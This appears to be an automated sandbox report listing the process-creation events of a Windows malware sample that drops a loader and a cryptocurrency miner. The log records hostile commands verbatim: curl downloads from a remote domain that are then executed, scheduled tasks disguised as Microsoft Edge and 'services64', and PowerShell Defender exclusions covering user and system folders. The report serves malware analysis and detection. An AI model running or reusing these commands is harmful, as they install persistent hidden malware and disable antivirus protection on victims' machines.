Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe "C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe"
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del conf.vbs 2>nul && curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php && cscript conf.vbs
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cscript.exe cscript conf.vbs
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "Microsoft Edge" /tr "C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe" /sc onlogon /rl highest /f
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del miner2.0.exe 2>nul && curl -o miner2.0.exe https://eijfrhegrtbrfcd.online/download/miner2.0.exe && start miner2.0.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -o miner2.0.exe https://eijfrhegrtbrfcd.online/download/miner2.0.exe
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\miner2.0.exe miner2.0.exe
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\svchost64.exe C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe"
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
Source: unknown	Process created: C:\Windows\System32\services64.exe C:\Windows\system32\services64.exe
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\services64.exe "C:\Windows\system32\services64.exe"
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\svchost64.exe C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\Microsoft\Libs\sihost64.exe "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\svchost64.exe C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\Microsoft\Libs\sihost64.exe "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
